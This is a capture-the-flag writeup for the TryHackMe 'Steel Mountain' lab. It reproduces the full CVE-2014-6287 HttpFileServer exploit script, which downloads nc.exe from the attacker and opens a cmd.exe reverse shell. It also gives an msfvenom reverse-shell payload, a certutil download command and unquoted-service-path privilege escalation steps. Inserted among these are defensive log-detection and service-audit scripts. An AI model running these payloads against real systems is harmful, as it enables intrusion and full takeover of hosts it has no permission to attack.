# TryHackMe - Steel Mountain Writeup

###### tags: `writeup` `tryhackme` `SteelMountain` `Easy`

## :computer: Port Scanning

First we run an nmap scan against the IP. We discover several web servers and that the target is a Windows machine.

```bash
# Nmap 7.92 scan initiated Mon Mar 28 11:28:46 2022 as: nmap -sV -T4 -sS -v -p- -oN Ports 10.10.55.10
Increasing send delay for 10.10.55.10 from 0 to 5 due to 989 out of 2472 dropped probes since last increase.
Increasing send delay for 10.10.55.10 from 5 to 10 due to 11 out of 20 dropped probes since last increase.
Nmap scan report for 10.10.55.10
Host is up (0.14s latency).
Not shown: 65520 closed tcp ports (reset)
PORT      STATE SERVICE            VERSION
80/tcp    open  http               Microsoft IIS httpd 8.5
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ssl/ms-wbt-server?
5985/tcp  open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8080/tcp  open  http               HttpFileServer httpd 2.3
47001/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49156/tcp open  msrpc              Microsoft Windows RPC
49183/tcp open  msrpc              Microsoft Windows RPC
49184/tcp open  msrpc              Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Mar 28 11:45:37 2022 -- 1 IP address (1 host up) scanned in 1011.52 seconds
```

- The web server on port 80 contains information for some secondary flags.
- The web server on port 8080 is the main way to obtain the user flag and the root flag.
## :eye: Enumeration

### Source code

We can see the first flag as a comment in the web page hosted on port 80. To see it, open the page and press **Ctrl+U**:

![](https://i.imgur.com/kQAcVdx.png)

As we can see in the image, the name of the photo is Bill Harper. With this information we know who the employee of the month is, and we have the first flag.

>Bill Harper

### Http File Server

After enumerating the web server on port 80 it looks like there is nothing else, so it is time to move on to the one on port 8080. We discover an HTTP File Server, and if we look on [exploit-db](https://www.exploit-db.com/) there is an RCE exploit for this web app.

![](https://i.imgur.com/wVmSc2H.png)

To identify the exact program we can google it or click on [httpfileserver 2.3](http://www.rejetto.com/hfs/), which redirects to the info page of the web app. Once we know the exact app and version, we can find it on exploit-db and start exploiting it.

With this we have three of the four flags in task 2.

Scan the machine with nmap. What is the other port running a web server on?
>8080

Take a look at the other web server. What file server is running?
>Rejetto HTTP File Server

What is the CVE number to exploit this file server?
>2014-6287

## :bomb: Exploitation

This is the exploit: https://www.exploit-db.com/exploits/39161

### :mag: Understanding the exploit

This exploit works in a curious way: first it retrieves a netcat binary from a web server. You have to edit the script and set your IP address and local port, and start the web server in the same directory where the compiled netcat binary is located.
```python
#!/usr/bin/python
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 04-01-2016
# Remote: Yes
# Exploit Author: Avinash Kumar Thapa aka "-Acid"
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
# Description: You can use HFS (HTTP File Server) to send and receive files.
#              It's different from classic file sharing because it uses web technology to be more compatible with today's Internet.
#              It also differs from classic web servers because it's very easy to use and runs "right out-of-the box". Access your remote files, over the network. It has been successfully tested with Wine under Linux.

#Usage : python Exploit.py <Target IP address> <Target Port Number>

#EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe).
#          You may need to run it multiple times for success!

import urllib2
import sys
try:
    # Stage 1: the "save" macro writes a VBScript downloader to C:\Users\Public\script.vbs
    def script_create():
        urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+save+".}")

    # Stage 2: the "exec" macro runs that VBScript, which fetches nc.exe from our web server
    def execute_script():
        urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe+".}")

    # Stage 3: a second "exec" macro launches nc.exe back to our listener
    def nc_run():
        urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe1+".}")

    ip_addr = "10.10.10.10" #local IP address
    local_port = "443" # Local Port number
    vbs = "C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"+ip_addr+"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with"
    save= "save|" + vbs
    vbs2 = "cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs"
    exe= "exec|"+vbs2
    vbs3 = "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20"+ip_addr+"%20"+local_port
    exe1= "exec|"+vbs3
    script_create()
    execute_script()
    nc_run()
except:
    print """[.]Something went wrong..!
    Usage is :[.] python exploit.py <Target IP address> <Target Port Number>
    Don't forgot to change the Local IP address and Port number on the script"""
```

With the exploit downloaded and the IP and port changed, we have to download a static netcat binary from GitHub. In this case we use this [file](https://github.com/skyformat99/netcat-for-windows/tree/master/1.12), but any static netcat binary will do. After downloading it we have to set up a local web server in the **same directory** we downloaded it to. We could do it with PHP or other languages, but this time I'm going to use python3.
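All three stages of the exploit above go through the same place: the `search` query parameter, a leading `%00`, and an HFS macro of the form `{.name|...}`. That makes the attack easy to recognise in web server logs. The following detector is an added example written for this writeup, not code from the original post or from the exploit author: it parses access-log lines in common log format (HFS's own log format is not assumed; the sample entries and IP addresses below are constructed), URL-decodes each query parameter, and reports any value that carries a macro, rating it high when the NUL byte filter bypass is present and medium when a bare macro appears.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log entries in common log format (illustrative only,
# not real HFS logs). The three 10.0.0.9 requests mirror the save/exec/exec
# stages of the exploit above, the 10.0.0.7 request carries a macro without the
# NUL byte, and the remaining lines are ordinary traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [28/Mar/2022:11:50:01 +0000] "GET /?search=holiday+photos HTTP/1.1" 200 512
10.0.0.9 - - [28/Mar/2022:11:50:07 +0000] "GET /?search=%00{.+save|C:\\Users\\Public\\script.vbs|dim%20xHttp.} HTTP/1.1" 200 312
10.0.0.9 - - [28/Mar/2022:11:50:09 +0000] "GET /?search=%00{.+exec|cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs.} HTTP/1.1" 200 312
10.0.0.9 - - [28/Mar/2022:11:50:12 +0000] "GET /?search=%00{.+exec|C%3A%5CUsers%5CPublic%5Cnc.exe.} HTTP/1.1" 200 312
10.0.0.7 - - [28/Mar/2022:11:51:00 +0000] "GET /?search={.info.} HTTP/1.1" 200 312
10.0.0.8 - - [28/Mar/2022:11:52:00 +0000] "GET /files/report.pdf HTTP/1.1" 200 90210
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)
# An HFS macro starts with "{." followed by the macro name, e.g. "{.exec|...}".
MACRO_RE = re.compile(r"\{\.\s*([A-Za-z_]+)")


def inspect_url(url):
    """Return one finding per query parameter value that carries an HFS macro."""
    findings = []
    # parse_qs percent-decodes the values, so %00 becomes "\x00" and "+" a space.
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    for name, values in params.items():
        for value in values:
            macros = MACRO_RE.findall(value)
            if not macros:
                continue
            nul = "\x00" in value
            findings.append({
                "param": name,
                "macros": macros,
                "nul_byte": nul,
                # NUL + macro is the CVE-2014-6287 filter bypass; a macro on its
                # own is still worth a look, so it gets a lower rating.
                "severity": "high" if nul else "medium",
            })
    return findings


def scan_log(text):
    """Run inspect_url over every parsable log line, tagging findings with IP and time."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for finding in inspect_url(m["url"]):
            alerts.append({"ip": m["ip"], "time": m["ts"], **finding})
    return alerts


def hosts_by_severity(alerts, severity="high"):
    """Distinct source IPs with at least one alert of the given severity."""
    return sorted({a["ip"] for a in alerts if a["severity"] == severity})


if __name__ == "__main__":
    alerts = scan_log(SAMPLE_LOG)
    for a in alerts:
        print(f'{a["severity"]:6} {a["ip"]:10} {a["time"]}  {a["param"]}={a["macros"]}')
    print("hosts with NUL-byte filter bypass attempts:", hosts_by_severity(alerts))
```

The decode step is the important part: matching on the raw `%00{.` string would miss the same payload sent with different encoding, while matching after `parse_qs` sees what HFS itself sees. In practice the same rule can be pointed at the real log file instead of `SAMPLE_LOG`.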
```bash
python3 -m http.server 8080
```

As we said before, the exploit first downloads the netcat binary onto the target machine, and the second time we run the exploit we receive a shell at the IP that we wrote into it.

![](https://i.imgur.com/ezFzP4u.png)

![](https://i.imgur.com/aqcCdFj.png)

To receive it we have to close the HTTP server and set up a netcat listener on our PC. After running the exploit twice we receive a shell on the target.

![](https://i.imgur.com/84YOK6H.png)

![](https://i.imgur.com/nE623jf.png)

If we go to Bill's Desktop we can see the flag:

![](https://i.imgur.com/pbzpGIA.png)

With this we have the last question of task 2:

>b04763b6fcf51fcd7c13abc7db4fd365

It's time to privesc!

### 🪜 ROOT PRIVESC

At the beginning, if we have no idea where to look, we can run [winpeas.bat](https://github.com/carlospolop/PEASS-ng/releases/tag/20220328). In this case the room tells us that it is an [Unquoted Service Path vulnerability](https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#unquoted-service-paths).

To enumerate the services we use one of these two commands:

```dos
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """
```

```dos
wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\\Windows\\system32\\" |findstr /i /v """
```

![](https://i.imgur.com/v7Bm1Yg.png)

To exploit this vulnerability we need to understand how Windows searches for a service's executable. Once we understand this, we know that **AdvancedSystemCareService9** is not in quotes and will be an exploitable service. Now we have to generate the payload and upload it to the right directory on the machine.
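The two `wmic` one-liners above only filter text; the reasoning behind them is how `CreateProcess` resolves an unquoted path with spaces: it tries every prefix that ends at a space, with `.exe` appended, before the full path. The script below is an added example for this writeup, not code from the original post or from winPEAS. It takes a service inventory with the same four fields the `wmic` command prints (the list here is constructed; the `AdvancedSystemCareService9` image path is an assumption, since the room only shows it in a screenshot), reproduces the page's filters (auto-start, outside `C:\Windows`, unquoted), lists the paths Windows would try first, and produces the quoted `binPath` that fixes the finding. The function names are mine.

```python
import re

# Constructed service inventory mirroring "wmic service get name,displayname,pathname,startmode".
# The IObit entry imitates the vulnerable service from this room (its ImagePath is an
# assumption); the other three are made-up controls: a System32 service, a correctly
# quoted vendor service, and an unquoted but manual-start service.
SAMPLE_SERVICES = [
    {"Name": "AdvancedSystemCareService9", "DisplayName": "Advanced SystemCare Service 9",
     "PathName": r"C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe", "StartMode": "Auto"},
    {"Name": "Spooler", "DisplayName": "Print Spooler",
     "PathName": r"C:\Windows\System32\spoolsv.exe", "StartMode": "Auto"},
    {"Name": "GoodVendorSvc", "DisplayName": "Good Vendor Agent",
     "PathName": r'"C:\Program Files\Good Vendor\agent.exe" -service', "StartMode": "Auto"},
    {"Name": "ManualTool", "DisplayName": "Manual Tool",
     "PathName": r"C:\Program Files\Some Tool\tool.exe", "StartMode": "Manual"},
]

EXE_RE = re.compile(r"\.exe\b", re.IGNORECASE)


def split_command(pathname):
    """Split a service command line into (executable, arguments, was_quoted).

    For unquoted lines the executable is assumed to end at the first ".exe"
    (a heuristic: Windows itself cannot tell where the path ends either)."""
    s = pathname.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        if end == -1:
            return s[1:], "", True
        return s[1:end], s[end + 1:].strip(), True
    m = EXE_RE.search(s)
    if not m:
        return s, "", False
    return s[:m.end()], s[m.end():].strip(), False


def search_candidates(exe_path):
    """Paths CreateProcess tries, in order, before the intended executable:
    each prefix ending at a space, with .exe appended."""
    candidates = []
    for i, ch in enumerate(exe_path):
        if ch == " ":
            prefix = exe_path[:i]
            candidates.append(prefix if prefix.lower().endswith(".exe") else prefix + ".exe")
    return candidates


def quote_path(pathname):
    """Return the remediated command line: executable in quotes, arguments untouched."""
    exe, args, quoted = split_command(pathname)
    if quoted:
        return pathname
    return f'"{exe}"' + (f" {args}" if args else "")


def audit(services, auto_only=True, skip_windows_dir=True):
    """Apply the same filters as the wmic one-liners and explain each hit."""
    findings = []
    for svc in services:
        if auto_only and svc["StartMode"].lower() != "auto":
            continue
        exe, _args, quoted = split_command(svc["PathName"])
        if quoted or " " not in exe:
            continue
        if skip_windows_dir and exe.lower().startswith("c:\\windows\\"):
            continue
        findings.append({
            "Name": svc["Name"],
            "PathName": svc["PathName"],
            "candidates": search_candidates(exe),   # what an attacker-controlled file would be named
            "fixed": quote_path(svc["PathName"]),   # value to set as the service binPath
        })
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_SERVICES):
        print(f'{f["Name"]}: {f["PathName"]}')
        for c in f["candidates"]:
            print("   tried first:", c)
        print("   fix binPath to:", f["fixed"])
```

For the IObit entry the candidate list ends with `C:\Program Files (x86)\IObit\Advanced.exe`, which is exactly why the room has you drop a file named `Advanced.exe` into `C:\Program Files (x86)\IObit\`. The `fixed` value is what an administrator would set with `sc config AdvancedSystemCareService9 binPath= "..."`; tightening the directory ACLs so unprivileged users cannot write there closes the same hole from the other side.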
We have to go to:

>C:\Program Files (x86)\IObit\

and download the payload there with certutil, but first we generate the payload and start the web server with python:

- To generate the payload we use msfvenom:

```bash
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.66.103 LPORT=80 -e x86/shikata_ga_nai -f exe -o Advanced.exe
```

- Then start the web server:

![](https://i.imgur.com/1H6WI6j.png)

- Download the file onto the target machine with certutil:

```dos
certutil -urlcache -f http://10.10.10.10:8080/Advanced.exe Advanced.exe
```

![](https://i.imgur.com/EyHOS16.png)

After that we create a nc listener on the port we configured in the payload (80 in this case), and we have to restart the service. To do that we use the following commands:

```dos
sc stop AdvancedSystemCareService9
sc start AdvancedSystemCareService9
```

After executing those commands we receive a **SYSTEM** shell in our nc listener and we can read the root flag.

![](https://i.imgur.com/6vmV02u.png)

The root flag is:

>9af5f314f57607c00fd09803a587db80

### You can find me on:

:bird: [**Twitter**](https://twitter.com/Aka_Mecanico)
:desktop_computer: [**Github**](https://github.com/Mec4nico)
:ballot_box_with_check: [**TryHackMe**](https://tryhackme.com/p/mech4nico)
:green_book: [**HackTheBox**](https://www.hackthebox.eu/home/users/profile/336092)